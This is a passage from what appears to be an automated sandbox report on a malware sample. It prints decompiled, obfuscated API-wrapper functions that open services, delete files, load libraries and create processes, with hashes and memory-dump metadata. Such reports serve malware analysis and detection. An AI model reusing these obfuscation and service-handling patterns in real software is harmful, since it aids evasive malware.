                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00239821
                                          0x00239822
                                          0x00239825
                                          0x00239828
                                          0x0023982a
                                          0x0023982c
                                          0x0023982f
                                          0x00239832
                                          0x00239835
                                          0x00239836
                                          0x00239837
                                          0x0023983c
                                          0x00239855
                                          0x00239858
                                          0x0023985f
                                          0x00239866
                                          0x0023986d
                                          0x00239874
                                          0x0023987b
                                          0x0023988e
                                          0x0023989b
                                          0x002398a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00237BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00237BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x00237bf7
                                          0x00237bf8
                                          0x00237bfa
                                          0x00237bfd
                                          0x00237bff
                                          0x00237c02
                                          0x00237c06
                                          0x00237c07
                                          0x00237c0f
                                          0x00237c1d
                                          0x00237c25
                                          0x00237c2d
                                          0x00237c31
                                          0x00237c38
                                          0x00237c3f
                                          0x00237c46
                                          0x00237c4a
                                          0x00237c5e
                                          0x00237c67
                                          0x00237c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00237C67
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 0e41601c5170870fff14c69e3aeec768b21d7b82c6e0726c682f4726547fb5ef
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: D2014FB190120CFFEB09DFA4D84A8DEBBB5EF44314F108198F40567240E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0022F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x0022f662
                                          0x0022f663
                                          0x0022f665
                                          0x0022f668
                                          0x0022f66a
                                          0x0022f66d
                                          0x0022f670
                                          0x0022f673
                                          0x0022f677
                                          0x0022f678
                                          0x0022f67d
                                          0x0022f687
                                          0x0022f693
                                          0x0022f69a
                                          0x0022f6a1
                                          0x0022f6a5
                                          0x0022f6a9
                                          0x0022f6b0
                                          0x0022f6c9
                                          0x0022f6d8
                                          0x0022f6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0022F6D8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: c219bc23b31abedc45fcf728708936782f9d9bba77c4ca36990c459a2553eb13
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25F21EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0022602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x0022b6f3
                                          0x0022b6f8
                                          0x0022b702
                                          0x0022b70b
                                          0x0022b712
                                          0x0022b719
                                          0x0022b720
                                          0x0022b727
                                          0x0022b72e
                                          0x0022b747
                                          0x0022b759
                                          0x0022b75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0022B759
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 805ceceae2d365355b6515513bd125146e4d87094100ab013cfcd0affd305b92
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 99012CB6951308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D3B15A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0023aa3f
                                          0x0023aa40
                                          0x0023aa41
                                          0x0023aa44
                                          0x0023aa47
                                          0x0023aa4b
                                          0x0023aa4c
                                          0x0023aa51
                                          0x0023aa5b
                                          0x0023aa64
                                          0x0023aa68
                                          0x0023aa6f
                                          0x0023aa76
                                          0x0023aa8d
                                          0x0023aa90
                                          0x0023aa9d
                                          0x0023aaa8
                                          0x0023aaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00225FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00225FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x00225fb5
                                          0x00225fb6
                                          0x00225fb7
                                          0x00225fbb
                                          0x00225fbc
                                          0x00225fc1
                                          0x00225fcb
                                          0x00225fd7
                                          0x00225fde
                                          0x00225fe5
                                          0x00225ffc
                                          0x00225fff
                                          0x00226006
                                          0x0022600d
                                          0x0022601a
                                          0x00226025
                                          0x0022602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 3004 Parent PID: 2800 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x0021295f
                                          0x00212964
                                          0x00212967
                                          0x0021296a
                                          0x0021296d
                                          0x0021296e
                                          0x0021296f
                                          0x00212977
                                          0x00212985
                                          0x0021298a
                                          0x00212992
                                          0x0021299a
                                          0x002129a2
                                          0x002129a9
                                          0x002129b0
                                          0x002129b7
                                          0x002129bb
                                          0x002129cf
                                          0x002129dc
                                          0x002129e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x0021c6e1
                                          0x0021c6e6
                                          0x0021c6f0
                                          0x0021c6fc
                                          0x0021c703
                                          0x0021c706
                                          0x0021c70d
                                          0x0021c711
                                          0x0021c715
                                          0x0021c71c
                                          0x0021c723
                                          0x0021c72a
                                          0x0021c731
                                          0x0021c738
                                          0x0021c751
                                          0x0021c762
                                          0x0021c768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x00211006
                                          0x00211009
                                          0x0021100c
                                          0x00211011
                                          0x00211016
                                          0x0021101d
                                          0x00211026
                                          0x0021102d
                                          0x00211034
                                          0x0021103b
                                          0x00211047
                                          0x0021104f
                                          0x00211057
                                          0x0021105e
                                          0x00211065
                                          0x0021106c
                                          0x00211073
                                          0x00211077
                                          0x0021108b
                                          0x00211096
                                          0x0021109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x0021485e
                                          0x0021487a
                                          0x0021487d
                                          0x00214884
                                          0x0021488b
                                          0x00214892
                                          0x0021489d
                                          0x002148a0
                                          0x002148ad
                                          0x002148b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00224f80
                                          0x00224f81
                                          0x00224f82
                                          0x00224f86
                                          0x00224f87
                                          0x00224f8c
                                          0x00224fa5
                                          0x00224fa8
                                          0x00224faf
                                          0x00224fb6
                                          0x00224fc7
                                          0x00224fca
                                          0x00224fd7
                                          0x00224fe2
                                          0x00224fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x00229772
                                          0x00229773
                                          0x00229778
                                          0x0022977a
                                          0x0022977b
                                          0x0022977e
                                          0x0022977f
                                          0x00229782
                                          0x00229785
                                          0x00229788
                                          0x00229789
                                          0x0022978c
                                          0x0022978f
                                          0x00229790
                                          0x00229791
                                          0x00229794
                                          0x00229797
                                          0x0022979a
                                          0x0022979d
                                          0x002297a0
                                          0x002297a3
                                          0x002297a6
                                          0x002297a7
                                          0x002297a8
                                          0x002297ad
                                          0x002297b7
                                          0x002297c3
                                          0x002297ca
                                          0x002297d1
                                          0x002297d8
                                          0x002297df
                                          0x002297e3
                                          0x002297fc
                                          0x00229816
                                          0x0022981d

                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
